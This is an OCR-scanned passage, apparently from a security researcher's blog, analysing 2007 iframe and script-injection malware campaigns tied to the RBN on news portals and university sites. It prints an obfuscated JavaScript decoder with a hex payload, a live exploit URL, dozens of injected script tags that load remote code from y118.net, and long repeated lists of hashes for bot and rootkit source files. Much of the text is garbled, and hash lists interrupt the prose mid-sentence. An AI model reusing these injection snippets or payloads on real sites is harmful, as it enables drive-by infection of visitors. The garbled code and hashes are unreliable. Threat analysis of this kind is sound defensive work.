Fe4AOuYwJe=gsTJb6AK65535 ;r7"e4AGuYwJe .toString(16) -toUpperCase() ;while(r7-length<4){r7="O"+r7; >e 
WAGUYwJe=(gsTJD6A>>>16)&65535 5 F=e4AGuYwe .toString(16) .toUpperCase( ) ;while(f.length<4){F="6"+F; >Q 
SrA=f+r7 svar Mjvar AabX=G;var m8;var WE;var J3A;var 

yO7Ue="" 5 Ffor(M=68;M<u3KeH7Bpc .length ;M+=2){J3A=6; Wr8N="" >; WO=""" > WO+=u3KeH7Bpc .charAt(M) ;W6+=u3KeH7B 
pe .charAt(M+1) ;m8=parseInt (WO, 16) ;J3A=m8-QSrA.charCodeAt(AabxX) ;if (AabX<QSrA.length-1){AabX++; pels 
e{fabX=O; >}M+=2;while(J3At=6){WG9"" | WO+"usKeH7Bpc .charAt(M) ;WO+"u3KeH7Bpc .charAt(M+1) ;m8=parselnt( 
6,16) 5 Wr8N+=String .fromCharCode(m8-QSra.charCodeAt(Aabx)) ;if (AaDX<QSrA.length-1){AabX++; pelse{fa 
bX=05 > JSA-— 5 M+=2 5 var 

g=parseInt(Wr8N) ;if (gt=8) {if (g>127) {Wr8N="GR" +g. toString()+";";>else<{Wr8N=String.fromCharCode(g) ; 
>yO7Ve+~r8N; >M-"2; document .write(y67Ve) ;Smojat[6)]"123; jiha+#119;AAMM[ BO) "1 ;AAAM[ 1] “AAMN[ 8]; ansta 
129=100; jiha3=199; jiha=Smojat[ 6) ;amst6129=161;} 

DFAMFB( *446F673468603D68736F 3a6367663B6874693a63686D3A7 0793068636B386967733b7 869396D6A3978693N636 
7693068736F3A636 763668727 139686937696A446N673460653b68 7 260343636 766387 87930686267376E69446A6a3468 
653A6d723068636D0386 967 7730686360386 967 783068626837 6e6 9446F 67346B60 38687 36F 3863676A3b687 36F 3A63676 
03b68726039686937696A446N67346d653B68736e0396b7 6386968 7630686260386 968743068636d376B69456N676N396E 
6F3A7360673568656D3A736a6E347 86C03b687 26033636 7663N6d733068626d37716E456a686A396e6F 3a736a6C0347 B6e3 
b6873603063676a3b687360306368603.a6D743b6865396668397360396367386967743068636e386968723b7 86b3a6669 
6D456a67673A6669684564a686239686a3a736A603568666E397b7 63063686 93b68736F 396667376068446C693568676B3 
97360396367376968446A67337 03869687A3B7 6693.26669684460693568656D3a7 3696935686660397b7 63a63676e3B68 
7260396569376e68446C69356865683a736N68347 6603b68737 6396367 6e3b68726a336368653b687 36F 39666037717 O4 
56968663066686844726e3568666e3A736968346d6E3B6872713a6367663B687272386367663B6873693A63686B3A6B72 
3b646B3A66686C 4561676430666 96D447 260356865 713736968346 a6E3a6B733b6C6b39666b39736939636a376967437 


During the weekend, the entire Newsland.ru which is among the most popular Russian news 
portals, was marked as as "this site may harm your computer" by StopBadware.org due to 
an IFRAME embedded link pointing to where else if not to [1]the RBN. Considering that each 
and every [2]embedded malware attack during 2007 that | assessed in previous posts, had 
something to do with the RBN in the form of a single RBN IP which was used in numerous 
malicious activities all at once, different sites get embedded with it, blackhat SEO postings at 
different forums etc. in this one the parties behind the attack dedicated a special IP with what 
looks like as a clean IP reputation. A [3]cached copy of the page will still load the live exploit 
url at 81.95.150.115/cgi-bin/in.cgi?p=user1 What really happened at Newsland.ru? Was it an 
end user who submitted a news story with the somehow embedded IFRAME to sort of conduct 
unethical competitive engagement by having Google mark the entire portal as harmful, or it 
was planned and executed on purposely? 


[4] 
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remove.cpp 
bec30fa04730b0e8f3dc5b9b3bf49bca 
remove.dsp 
224a1dadc892b4c2f45272926f3d100c 
remove.dsw 
6c87112017aad0a5ce8acaa25d6806c5 
remove.ncb 
3e6ee0d5ae27cfddfff0f9bb6617db13 
advscan.cpp 
fdala6da4cad2a683e182414267a7985 
advscan.h 
5c5f7fo1lb7ed612771lab2bdcO1lab9f9b 
banner.cpp 
le2bdef556281404cc9a3321aa7a407c 
banner.h f27746db68f05c719251ladba69d0c4bb 
commands.cpp 
cdc552779515f2d6699da6a04959a765 
commands.h 
3d74b4e858e39c5eb992e9034839f195 
configs.h 
05b9b113f1c78268b1feb5a3ead2f164 
crypt.cpp 
f03cca9691dd9ad588e4287524021c3e 
crypt.h 
c2edef9177543e1b8a8611d347d99b66 
dcom.cpp af90ccde9f7bbcaef92e9d6abee25af3 
dcom.h 
1515fd93ad7196026d7679f5b478alab 
defines.h 
8e93714099c843036a2aa9b2bcec9697 
download.cpp 
2b17d55de73f19dfa454d78dd579a966 
download.h 
d9157dc8f81483e56884f62a6473d717 


driveinfo.cpp 
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87a2e732800aa01820b0aee958cc8b03 
driveinfo.h 
0e4b63578110edb7511798fbb69827 Off 
externs.h 
67adfb72efa5b95b8bd0144a86cc5e74 
fphost.cpp 
adf7db95bd67da6577c0aaa469737f5f 
fphost.h eff3d1ba2e46287f3b0d01571aa2ac73 
ftpd.cpp e06bcc127636ebf60b6ed52bb321a617 
ftpd.h 
da4f3d350101ladb59be91cal6fec3be2 
fu.cpp 
4c12e14985891ba6e7fe1d978ccf0756 
fu.h 
5ee58b9c18fe86d14654fe31c1793606 
fudll.h 
440e034c517d25b7039bcc1f86f064a3 
functions.h 
774de6ce4ddfc9ef4cOaaa9fcb3bd801 
includes.h 
e8a8f862af5ab02fabf65f4ab024786e 
info.cpp 459cabebf510caf14b0c87fb8441fcfa 
info.h 
70994ba4e7570710ddc3a4c91e494c22 
ioctlcmd.h 
278822516d1890ad95db1872d6626efc 
irc.cpp 
b48114a264d5b2fe27b00bb0fc819bbb 
irc.h 
1261d7930e35b8c5254d204315f6ca81 
keylog.cpp 
a6d6a69e440864e350e9d13f5b5db023 
loaddlls.cpp 
bfbfe5f78f429b3898a9100d7ad2bfd3 
loaddlls.h 
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8f0c2c63112210df17b3d53262ca7839 
Isass.cpp 
4615f57239b16915f7f24594c2fe7de7 
Isass.h 
8d3db94c754b7422e35ed423204b902b 
ms04-007.cpp 
3134f6a18149e915231d6616b99e8f48 
ms04-007.h 
36d52f712f2976765d05b2368627c14d 
ms05-039.cpp 
076ac1492a1f9bef93cO2dfele0495f9 
ms05-039.h 
67971cf0Oae84a5f82f82c5fbf625f322 
mssql.cpp 
bb15434cef41ca090a95a39c444d92c5 
mssqI.h 
700d257c41a1d9ec1e4795c940a7bace 
netbios.cpp 
fd3958d6el1af752889a20d6be38e6f01 
netbios.h 
10a1535d311b113b8702f6789d1ad1b3 
netdde.cpp 
ea06c222b3cf4fd73aced46b38f64097 
netdde.h 717faalb591f7b9e0dbca80c3393ac6f 
netstatp.cpp 
820e8648707f632b3d90f9f3ab22e0db 
netstatp.h 
1ce3bb0d2241980dc247ceb1b14768e4 
netutils.cpp 
7830f76b77cbdd0ba87344e491afd317 
netutils.h 
d9f9bd3a26e840e4c54477cbecb2247d 
passwd.h a64a53096b26140f039f7cd09e8510d7 
pnp.cpp 
79c6418ae17a95f0896696e0cd8ea3fc 
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pnp.h 
0d164366352a45fed1ld5baaada0bce02 
processes.cpp 
4a345dd631db41ladbf016219bfd07bf6 
processes.h 
d648e2988a7cbd350564502a8e80f30b 
protocol.cpp 
33bf84550e56b7d5a042515ddf9clall 
protocol.h 
341a39ceb14f519cd0601f383b292dd8 
pstore.cpp 
279bd2658f175e185ac84f27d83a541a 
pstore.h 9f6785ef830bb25955f2609adf24ab11 
pstorec.tlh 
7e57ce70e18a793e04d23ad14bb59bec 
pstorec.tli 
1d88121153933cceaa72c700b3803bd1 
redirect.cpp 
1d3480013ca7ddc71715c081c7fe9d29 
redirect.h 
8f1f0e837904818efcfdf14f1928f1e0 
regcontrol.cpp 
2fe90dd6cac60e88ab6ca3ed83d424d6b 
regcontrol.h 
dbc9b0243d5f43cldad546b5e3bf1c80 
reptile.cpp 
c0c728766e7301c6aa3575c02fab6c9ea 
reptile.dsp 
38faal0c55dd141e515da40a85d7b18e 
reptile.dsw 
a7097dcfc065b5e433a8749ac55db41f 
reptile.h 
1e13d2301a263a27b82bf5f0fbae35d7 
reptile.ncb 
9c8158b48e1458c7582792741f4b9d4b 
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reptile.opt 
6bf7ae942b60a3cc0074986d453cb51e 
reptile.plg 
3478d177032644d6f24d401e29034bf2 
reptile.sin 
99225f98e5b4016e2408f0402086095d 
reptile.suo 
d69a2d741b17f258819b0325f5401277 
reptile.vcproj 
6350356b12abf48d70e04547a097bdd4 
reptilepass.txt 
0e4255a3221bcce5d6c4df2be59088e7 
secure.cpp 
b33e86824916d682df59d7df5ab35b03 
secure.h 3e5e€65e967be2469a4544b29c9e41654 
service.cpp 
4395519fbd3d301f873c386bec2da638 
service.h 
792e15803e093c9fc96cafaabe7aea20 
sniffer.cpp 
2b40bbb810d2f62c42558f84da8e1c90 
sniffer.h 
4ef5ae8e0dc1047966d5ede7ead4ff5a 
socks4.cpp 
535622e9a3898e1c7adc64e3d787168d 
socks4.h fc7e5609a8c08736a10fb15738755a5d 
speedtest.cpp 
9b927276e0f042cb3c471daedd02dfc5 
speedtest.h 
7afo2905c5a83055e7ce59520e2451c0 
strings.h 
aebbf8cb2a85bff3ce27de88b87b1246 
stub.exe 5d9e0094c47b9de4473bea1d966c4f96 
svchost.cpp 

6955b9e7 e96f4edfa70463f838d0a2d8 
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svchost.h 

49fe28536804b16/7fffaa5e5df7ficed 

tcpip.h 

3b1014de227e11ffe78ba38aa0678326 
thcsql.cpp 
a061835d7679a51bba663b2a4f4e6c52 
thcsql.h 09a759a5deb484aaa4bd0f792a239a01 
threads.cpp 
6df12801909bb276ebe64394a0a33be2 
threads.h 
2926c6cb286cb5d401ccb4947aa6ec61 
utility.cpp 

led356ef075de697 7dfa9ce95c14dc34 

utility.h 

079c35601e969cbcfl6d0felflb2cca3 
vscan.cpp 
ea43fab3996a246af9db6ff42e3dc904 

vscan.h 

548a2a96dc5af54b7eeb20527c511a3e 
vscandef.h 
3b865cc81cc3ec8533e269e0dbd2090a 
wins.cpp 3ff6c21878d0357d1763b5345478e972 
wins.h 

a9a720198a6ff01d382f4cff17a8e429 
wkssvc.cpp 
ea2c47644a3e775a9b784b4f0367c4cf 
wkssvc.h d9edf37a190717fb60a5a13del10dal5e 
Driver.cpp 
da597ef704450dc6904423517235ef90 
Driver.dsp 
1f7e4ff782992330e6ed605d6b8acfbf 
Driver.dsw 
846ff40dec86f0d4dd4692dd0e3d7e3f 

Driver.h 7404062b35f7bd208c655743a0244550 
Driver.ncb 
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79ed9635dcd429b20560006363a38725 
ioctlcmd.h 
278822516d1890ad95db1872d6626efc 
Jiurl PortHide.cpp 
cfa49de552c06a8dda5fca38f35ab4le 
Jiurl _PortHide.h 
3e0d1188486e85ce18678cea28066cd0 
Jiurl tcpioctl.h 
3a7eba644b780e2a0f80a2ef84a4d5e3 
ProcessName.c 
cleabda9fe46de0f319ab6d9e9FF7399 
ProcessName.h 
f9151b283bf37ae51fd410fdacd8a962 
Rootkit.cpp 
24dceblacff18fc6a3ba90895450677b 
Rootkit.h 
020c7d2c685ecf554c32ed643bcc8c8e 
encrypt.exe 
7d400a514eebececabc78541fe5cb5e4 
reptile.txt 
9d4b0252138c69c59720d95f9ec121F7 
remove.cpp 
bec30fa04730b0e8f3dc5b9b3bf49bca 
remove.dsp 
224a1dadc892b4c2f45272926f3d100c 
remove.dsw 
6c87112017aad0a5ce8acaa25d6806c5 
remove.ncb 
3e6ee0d5ae27cfddfff0f9bb6617db13 
advscan.cpp 
99c9ce19ccb250ec5e69135838955443 
advscan.h 
5c5f7fo1lb7ed612771lab2bdcOlab9f9b 
asn.cpp 
b95bd20efff49b927dal6e213f438749 
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asn.h 
b9321a4d186254af897035566e86e114 
banner.cpp 
le2bdef556281404cc9a3321aa7a407c 
banner.h f27746db68f05c719251ladba69d0c4bb 
commands.cpp 
24b6422882b662bafb998d0a9c27e753 
commands.h 
89040fed6a3832f75a4b978ee0ffb4d1 
configs.h 
2ed7bdb036841f7ad899d572bd20984b 
configs.h.bak 
4d3957d300611cc52a28c518b7e8d889 
crypt.cpp 
f03cca9691dd9ad588e4287524021c3e 
crypt.h 
c2edef9177543e1b8a8611d347d99b66 
dcom.cpp af90ccde9f7bbcaef92e9d6abee25af3 
dcom.h 
1515fd93ad7196026d7679f5b478alab 
defines.h 
9f4f6311bddb85b43564fc5c5ac0466b 
download.cpp 
2b17d55de73f19dfa454d78dd579a966 
download.h 
d9157dc8f81483e56884f62a6473d717 
driveinfo.cpp 
87a2e732800aa01820b0aee958cc8b03 
driveinfo.h 
0e463578110edb7511798fbb69827 Off 
externs.h 
67adfb72efa5b95b8bd0144a86cc5e74 
fphost.cpp 
adf7db95bd67da6577c0aaa469737f5f 
fphost.h eff3d1ba2e46287f3b0d01571aa2ac73 
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ftpd.cpp e06bcc127636ebf60b6ed52bb321a617 
ftpd.h 
da4f3d35010ladb59be91cal6fec3be2 
fu.cpp 
4c12e14985891ba6e7fe1ld978ccf0756 
fu.h 
5ee58b9c18fe86d14654fe31c1793606 
fudll.h 
440e034c517d25b7039bcc1f86f064a3 
functions.h 
774de6ce4ddfc9ef4c0aaa9fcb3bd801 
includes.h 
0a1d9b209a062601a48de310f6939354 
info.cpp 948acaa3d8a91285e456fe727a9bfe00 
info.h 
70994ba4e7570710ddc3a4c91e494c22 
ioctlcmd.h 
278822516d1890ad95db1872d6626efc 
irc.cpp 
b48114a264d5b2fe27b00bb0fc819bbb 
irc.h 
1261d7930e35b8c5254d204315f6ca81 
keylog.cpp 
a6d6a69e440864e350e9d13f5b5db023 
loaddlls.cpp 
bfbfe5f78f429b3898a9100d7ad2bfd3 
loaddlls.h 
8f0c2c63112210df17b3d53262ca7839 
Isass.cpp 
4615f57239b16915f7f24594c2fe7de7 
Isass.h 
8d3db94c754b7422e35ed423204b902b 
mssql.cpp 
bb15434cef41ca090a95a39c444d92c5 
mssql.h 
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700d257c41a1d9ec1e4795c940a7bace 
netbios.cpp 
fd3958d6elaf752889a20d6be38e6f01 
netbios.h 
10a1535d311b113b8702f6789d1ad1b3 
netdde.cpp 
ea06c222b3cf4fd73aced46b38f64097 
netdde.h 717faalb591f7b9e0dbca80c3393ac6f 
netstatp.cpp 
820e8648707f632b3d90f9f3ab22e0db 
netstatp.h 
1ce3bb0d2241980dc247ceb1b14768e4 
netutils.cpp 
7830f76b77cbdd0ba87344e491afd317 
netutils.h 
d9f9bd3a26e840e4c54477cbecb2247d 
passwd.h a64a53096b26140f039f7cd09e8510d7 
pnp.cpp 
765e08ald39b6eae030flaef4c479238 
pnp.h 
0d164366352a45fed1ld5baaada0bce02 
processes.cpp 
4a345dd631db41ladbf016219bfd07bf6 
processes.h 
d648e2988a7cbd350564502a8e80f30b 
protocol.cpp 
74f42a7dc29c86872a6b169549cf9alb 
protocol.h 
341a39ceb14f519cd0601f383b292dd8 
pstore.cpp 
279bd2658f175e185ac84f27d83a541a 
pstore.h 9f6785ef830bb25955f2609adf24ab11 
redirect.cpp 
1d3480013ca7ddc71715c081c7fe9d29 
redirect.h 
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“></script>">education<script sre="“http://y118-net/6.js"></script></a> <a class="“tagsize16" 
href="/tags/electro<script src=“http://y118 .net/8.js"></script>>electro<script 

src="nttp://y118 .net/6.js"></script></a> <a class="tagsize18" href="/tags/electronic<script 
sre="nhttp://y118 .net/6.js"></script>”>electronic<script src="http://y118 .net/6.js"></script></a> 
<a class="tagsize18" href=""/tags/plectronica<script 

sre="http://y118 .net/6.js"></script>">electronica<script sre="http://y118.net/6@.js"></script></a> 
<a class*"tagsize18" href="/tags/entertainment<script 

srcee"http://y118 .net/6.js"></script>">entertainnent<script 

sre="“http://y118 .net/6.js"></script></a> <a class="“tagsize16" href="/tags/family<script 
src="http://y118 .net/6.js"></script>">family<script src=“http://y118.net/@.js"></script></a> <a 
class="tagsize18" href="/tags/film<script src="http://y118.net/6.js"></script>”>film<script 
src="nhttp://y118 .net/6.js"></script></a> <a class="tagsize12" href="/tags/food<script 
sre="http://y118 .net/6.js"></script>">food<script src="http://y118.net/6.js"></script></a> <a 
class="tagsize16" href="/tags/football<script 

src="http://y118 .net/6@.js"></script>">football<script src="http://y118-net/6.js"></script></a> <a 
class*"tagsize18" hrefe"/tags/Free<script srce“http://y118 .net/0.js"></script>">free<script 
srce“http://y118 .net/6.js"></script></a> <a class="“tagsize18" href#"/tags/fun<script 
sre="http://y118 .net/6.js"></script>">fun<script src="http://y118.net/8.js"></script></a> <a 
class="tagsize16" href="/tags/funk<script src="http://y118 -net/6.js"></script>">funk<script 
src="nttp://y118 .net/6.js"></script></a> <a class="tagsize18" href="/tags/funny<script 
sre="http://y118 .net/6.js"></script>">funny<script src="http://y118 .net/6.js"></script></a> <a 
class="tagsize18" href="/tags/games<script src="http://y118 .net/6.js"></script>">games<script 
sre="http://y118 .net/6.js"></script></a> <a class="tagsize16" href=""/tags/gay<script 
srce"“http://y118 .net/6.js"></script>">gay<script srce"http://yl18.net/O.js"></script></a> <a 
classe"tagsize18" hrefe"/tags/god<script srcee“http://y118.net/0.js"></script>">god<script 
sre=“http://y118 .net/8.js"></script></a> <a class="“tagsize18" href=""/tags/Health<script 
sre="“http://y118 .net/6.js"></script>”>health<script src=“http://y118.net/6.js"></script></a> <a 
class="tagsize16" href="/tags/Hip Hop<script src="http://yl118.net/6.js"></script>>hip hop<script 
src="nhttp://y118 .net/6.js"></script></a> <a class="tagsize18" href="/tags/house<script 
sre="http://y118 .net/6.js"></script>">house<script src="http://y118 .net/6.js"></script></a> <a 
class="tagsize18" href="/tags/humor<script src="http://y118 .net/6.js"></script>">humor<script 
sree"http://y118 .net/6.js"></script></a> <a class*"tagsize16" href="/tags/independent<script 
sree"http://y118 .net/6.js"></script>">independent<script sree“http://y118.net/6.js"></script></a> 


In another such incident, Podfeed.net was recently hacked and [5]malware embedded at its 
front page. The now clean site however, used to have an embedded link, over 20 times to be 
precise, pointing to the following URL : 


yl18.net/0.js (125.65.77.25) with the .js having two IFRAMEs within, namely yl18.net/0.html 
- 404 dead, and the second IFRAME yl18.net/z.html which loads a third IFRAME within, 
pointing to yzgames.cn/game.htm (125.46.105.140). This IFRAME-ing game relies entirely 
on yl18.net/0.js to keep up and running, and a direct loading link to the script was also 
somehow embedded on high trafficked sites such as cincinnatiusa.com; cincinnati.com; guid- 
ance.nice.org.uk. Moreover, Maarten Van Horenbeeck at the [6]ISC’s blog has some detection 
rates while the malware was still active. This embedded malware campaign is a perfect 
example of an ongoing cover up, just like the case when several hours after the community 
started looking at the [7]Bank of India’s malware serving site and the RBN URL removed the 
javascript and redirected it to Google.com, and we had the same situation with the recent 
discovery of 100 malwares on a single RBN IP, where the directory name has changed several 
hours later for yet another time. The same is the situation withe the malicious parties behind 
[8]Possibility Media’s malware attack that once started getting visited by security vendors 
replaced all their main index page with a "get lost" message, as well as with [9]RBN’s fake 
"account suspended" messages which aren’t really in a process of cover up, but in a deception 
stage like always. 


While | was researching a third domain that was serving a Banking trojan, and loading IFRAMEs 
to sicil.info which in case you don’t remember is the IFRAME behind the [10]Syrian Embassy 
hack, | came across to [11]injected blackhat SEO campaigns at two universities advertised in 
between the IFRAMEs, now removed, cached copies available - emissary.wm.edu/EE/cache; 
hsutx.edu/student _life/brand/wp-content/uploads. The reason | won’t mention the domain in 
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8f1f0e837904818efcfdf14f1928f1e0 
regcontrol.cpp 
2fe90dd6cac60e88abca3ed83d424d6b 
regcontrol.h 
dbc9b0243d5f43cldad546b5e3bf1c80 


reptile.cpp 
c0c728766e7301c6aa3575c02fab6c9ea 
reptile.dep 
6fa3b86313e460467999c7bfb8c41f7e 
reptile.dsp 
8c0d7907fd2702b02e585cbf39c2550a 
reptile.dsw 
a7097dcfc065b5e433a8749ac55db41f 
reptile.h 
1e13d2301a263a27b82bf5f0fbae35d7 
reptile.mak 
eba2043ee1f3199923304e711cc2dal10 
reptile.ncb 
0418417792d1c03fe8b860858a753069 
reptile.opt 
08359868d8528647179c7c562b83da63 
reptile.plg 
9292e7e2c3f6149bc343638c44278f97 
reptile.sin 
90bf17a33618855383b5e5a6adfaf357 
reptile.suo 


697d1lcb2be6edab175cf56ffe7206ba2 
reptile. vcproj 
f320c52e237ada5286488b3b4cf6cdfa 
reptilepass.txt 
ae0f936ada915314beae4cb1656ae3dd 
secure.cpp 
b33e86824916d682df59d7df5ab35b03 
secure.h 3e5€65e967be2469a4544b29c9e41654 
service.cpp 
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4395519fbd3d301f873c386bec2da638 
service.h 
792e15803e093c9fc96cafaabe7aea20 
sniffer.cpp 
2b40bbb810d2f62c42558f84da8e1c90 
sniffer.h 
4ef5ae8e0dc1047966d5ede7ead4ff5a 
socks4.cpp 
535622e9a3898elc7adc64e3d787168d 
socks4.h fc7e5609a8c08736a10fb15738755a5d 
speedtest.cpp 
9b927276e0f042cb3c471daedd02dfc5 
speedtest.h 
7afb2905c5a83055e7ce59520e2451c0 
strings.h 
13cc2e46c8a3dd6ad154b13a518822b9 
stub.exe 5d9e0094c47b9de4473beal1d966c4f96 
svchost.cpp 
6955b9e7e96f4edfa70463f838d0a2d8 
svchost.h 
49fe28536804b16/7fffaa5e5df7ficed 
tcpip.h 
3b1014de227e11ffe78ba38aa0678326 
thcsql.cpp 
a061835d7679a51bba663b2a4f4e6c52 
thcsql.h 09a759a5deb484aaa4bd0f792a239a01 
threads.cpp 
6df12801909bb276ebe64394a0a33be2 
threads.h 
2926c6cb286cb5d401ccb4947aa6ec61 
utility.cpp 
ae95f0056e4f533c72cc42b1d26b767d 
utility.h 
8bae67fec2e4cc271e50d9052c6e6724 


vscan.cpp 
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ea43fab3996a246af9dbe6ff42e3dc904 
vscan.h 
548a2a96dc5af54b7eeb20527c511a3e 
vscandef.h 
3b865cc81cc3ec8533e269e0dbd2090a 
wins.cpp 3ff6c21878d0357d1763b5345478e972 
wins.h 
a9a720198a6ff01d382f4cff17a8e429 
wkssvc.cpp 
f559be6c88e2083d7295af94e54aecc4 
wkssvc.h 67b56da4edd9ae6caa47ffl1d9e530fd6 
Driver.cpp 
da597ef704450dc6904423517235ef90 
Driver.dsp 

1f7 e4ff782992330e6ed605d6b8acfbf 
Driver.dsw 
846ff40dec86f0d4dd4692dd0e3d7e3f 
Driver.h 7404062b35f7bd208c655743a0244550 
Driver.ncb 
79ed9635dcd429b20560006363a38725 
ioctlcmd.h 
278822516d1890ad95db1872d6626efc 
Jiurl PortHide.cpp 
cfa49de552c06a8dda5fca38f35ab4le 
Jiurl _PortHide.h 
3e0d1188486e85ce18678cea28066cd0 
Jiurl tcpioctl.h 
3a7eba644b780e2a0f80a2ef84a4d5e3 
ProcessName.c 
cleabda9fe46de0f319ab6d9e9FfF7399 
ProcessName.h 
f9151b283bf37ae51fd410fdacd8a962 
Rootkit.cpp 
24dceblacff18fc6a3ba90895450677b 
Rootkit.h 
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020c7d2c685ecf554c32ed643bcc8c8e 
encrypt.exe 
7d400a514eebececabc78541fe5cb5e4 
reptile.txt 
9d4b0252138c69c59720d95f9ec121f7 

asn1.h 

2bae81693ebf68e23f3ad3f3021889be 
asn1_mac.h 
7e10de898ecd175a61a0dbfb12185c2a 

bio.h 

ce7243ecaa4b719218elbf752adfObed 
blowfish.h 
d49e3298bc64a6e465ed7718f564d8af 

bn.h 

b37a3ef0588ce34e0c63a5274aa44961 
buffer.h 356a812a4ffc0968b57ac95e7a63ab78 
cast.h 

96116e52361c2d0300342bfb6903a3bd 
comp.h 
0c90612a2a019eaef34bdbcc66a021b8 

conf.h 

38754a66c81b8f8b8590ed04b78d161d 

conf _api.h 
844d6a3830cb086ca59f131b1484d44b 
crypto.h 3bb8443f7f07e9234e96ec9579f090d0 
des.h 

0d6c580e72b14b714df7ae5f5318fb3f 

dh.h 

f9a01c2ca0be5ead86ea26fd6574c2b4 

dsa.h 

665bdb1458242049a166edf3acd7170b 

dso.h 

4071b80cdab58b3fceaa958cOccdce46 
ebcdic.h b39613d8ce01e224ae72baa0246892e7 
engine.h 9834177eba2e98bd0f5381e74c2d3d5f 
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err.h 
e9fa3cc5d24d8f10e18490856f4da054 


evp.h 
620990a191df1ca247387f09c06f3b3c 
e _os.h 
62fbb35194165d3a5cb3d10e75aaa818 
e _os2.h 
784f6a58114c353b8e6f3a7787065cf3 
hmac.h 
b660alb6e6d396efcbdcf6412e93cb93 
idea.h 
fdc6d4d55fed4dbbf381e80ab275318b 
lhash.h 
5d5084cdce6d7bc60dc400f7d4faaccf 
md2.h 
4bf98d5033c334181483471c86e38267 
md4.h 
37af532a0408e1f9dd470374c52aeb87 
md5.h 
32c0cc65f2d457e9c0302b6e14233424 
mdc2.h 
2d9994df4b22705c60dd3f4bf242a7cl 
objects.h 
4187608d042df711837945991109f9fc 
obj _mac.h 


2e39e6bffb05ddbadb58aedc947f741f 

openssliconf.h 

1356dbc2305c7ba93decedla3e45alc2 

opensslv.h 

83a195ad2b394633f9d8ec69631a51lac 

pem.h 

c679bc0909305501723b0badf24c02be 

pem2.h 

2aee9bcf129f9962f3afaed608385850 

pkcs12.h 779cf7c87331535dfd5bf69a97b2fb3d 
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pkcs7.h 
0d668a62e9c4a7c6ab6d9eb61f6e5c685 
rand.h 
27d59b95a7eba54a99fd862039f4dffO 
rc2.h 
0d488e28bb20ff3788fe8c52133d1cfb 
rc4.h 
1c5b8415fc3cecfcc6a5359eccbd5dbd 
rc5.h 
94932666f36526419623555f90ab050a 
ripemd.h 350da6b77dcb285c59c78ce7671d2873 
rsa.h 
fd6cc4c4072d3b43ba8c8d62cca229bc 
rsaref.h 58fd3f7f75cb5841387a529b888eff7b 
safestack.h 
a4174efaacdbdcb936dea701193bc8f3 
sha.h 
d35627cd8cef90002563554a8d891c84 
ssl.h 
73ef4c68b58632f2f2b55e750b7ee06d 
ssl2.h 
ddce87b1a7e4af3aa35ca8a665db6eb0 
ssl23.h 
71ae764cc97086829353194e4d9ff2e9 
ssl3.h 
e04e9f4F267129548c0e59fb144cd9bb 
stack.h 
81e9f97755996e1711e81aac115a33bd 
symhacks.h 
736e542efdfc7d21535a6ff8b3c03a45 
tls1.h 
d1c9de5aad2c0490825c2e1885a7e098 
tmdiff.h 8b6b6f8df660f682d29b153cfe760674 
txt _db.h 
730e334f531c6a0ac0ae95e252c53f64 
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x509.h 
3d93e919f45a81357b4b97dfa0f84155 


x509v3.h 81671fe50ed0f46bd427efbe1387844d 


x509 _vfy.h 
a1954b5542b923971a40f046cbd4celc 
libeay32.lib 
31d145ada2de7ee054f490e958aab61d5 
libeay32D.lib 
fc2f69ad8302664ba1780aadc8507759 
ssleay32.lib 
2d28bcdb0ec035da5c5fc716e1653d53 
ssleay32D.lib 
2ef69db57b73874ed9fa37b06be5cbc6 
buf.txt 
08957cd9ad643ac8455b0cfb33720ded 


icon.ico 76685dfa5860561a421b7acc5f5c37fb 


resource.h 
f2f1500e77505ed3fcbe126c72ad8d29 
pstorec.tlh 
48ad50888b7576e0d6b2832efaal3263 
pstorec.tli 
5509987709d64118951b49ffa609cf86 
remove.cpp 
bec30fa04730b0e8f3dc5b9b3bf49bca 
remove.dsp 
224a1dadc892b4c2f45272926f3d100c 
remove.dsw 
6c87112017aad0a5ce8acaa25d6806c5 
remove.ncb 
3e6ee0d5ae27cfddfff0f9bb6617db13 
advscan.cpp 
99c9ce19ccb250ec5e69135838955443 
advscan.h 
5c5f7fbo1lb7ed612771lab2bdcOlab9f9b 


asn.cpp 
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b95bd20efff49b927dal6e213f438749 
asn.h 
b9321a4d186254af897035566e86e114 
banner.cpp 
le2bdef556281404cc9a3321aa7a407c 
banner.h f27746db68f05c719251ladba69d0c4bb 
commands.cpp 
24b6422882b662bafb998d0a9c27e753 
commands.h 
89040fed6a3832f75a4b978ee0ffb4d1 
configs.h 
2ed7bdb036841f7ad899d572bd20984b 
configs.h.bak 
4d3957d300611cc52a28c518b7e8d889 
crypt.cpp 
f03cca9691dd9ad588e4287524021c3e 
crypt.h 
c2edef9177543e1b8a8611d347d99b66 
dcom.cpp af90ccde9f7bbcaef92e9d6abee25af3 
dcom.h 
1515fd93ad7196026d7679f5b478alab 
defines.h 
9f4f6311bddb85b43564fc5c5ac0466b 
download.cpp 
2b17d55de73f19dfa454d78dd579a966 
download.h 
d9157dc8f81483e56884f62a6473d717 
driveinfo.cpp 
87a2e732800aa01820b0aee958cc8b03 
driveinfo.h 
0e463578110edb7511798fbb69827 Off 
externs.h 
67adfb72efa5b95b8bd0144a86cc5e74 
fphost.cpp 
adf7db95bd67da6577c0aaa469737f5f 
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fphost.h eff3d1ba2e46287f3b0d01571laa2ac73 
ftpd.cpp e06bcc127636ebf60b6ed52bb321a617 
ftpd.h 
da4f3d350101ladb59be91cal6fec3be2 
fu.cpp 
4c12e14985891ba6e7fe1d978ccf0756 
fu.h 
5ee58b9c18fe86d14654fe31c1793606 
fudll.h 
440e034c517d25b7039bcc1f86f064a3 
functions.h 
774de6ce4ddfc9ef4c0aaa9fcb3bd801 
includes.h 
0a1d9b209a062601a48de310f6939354 
info.cpp 948acaa3d8a91285e456fe727a9bfe00 
info.h 
70994ba4e7570710ddc3a4c91e494c22 
ioctlcmd.h 
278822516d1890ad95db1872d6626efc 
irc.cpp 
b48114a264d5b2fe27b00bb0fc819bbb 
irc.h 
1261d7930e35b8c5254d204315f6ca81 
keylog.cpp 
a6d6a69e440864e350e9d13f5b5db023 
loaddlls.cpp 
bfbfe5f78f429b3898a9100d7ad2bfd3 
loaddlls.h 
8f0c2c63112210df17b3d53262ca7839 
Isass.cpp 
4615f57239b16915f7f24594c2fe7de7 
Isass.h 
8d3db94c754b7422e35ed423204b902b 
mssql.cpp 
bb15434cef41ca090a95a39c444d92c5 
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mssql.h 
700d257c41a1d9ec1e4795c940a7bace 
netbios.cpp 
fd3958d6el1af752889a20d6be38e6f01 
netbios.h 
10a1535d311b113b8702f6789d1ad1b3 
netdde.cpp 
ea06c222b3cf4fd73aced46b38f64097 
netdde.h 717faal1b591f7b9e0dbca80c3393ac6f 
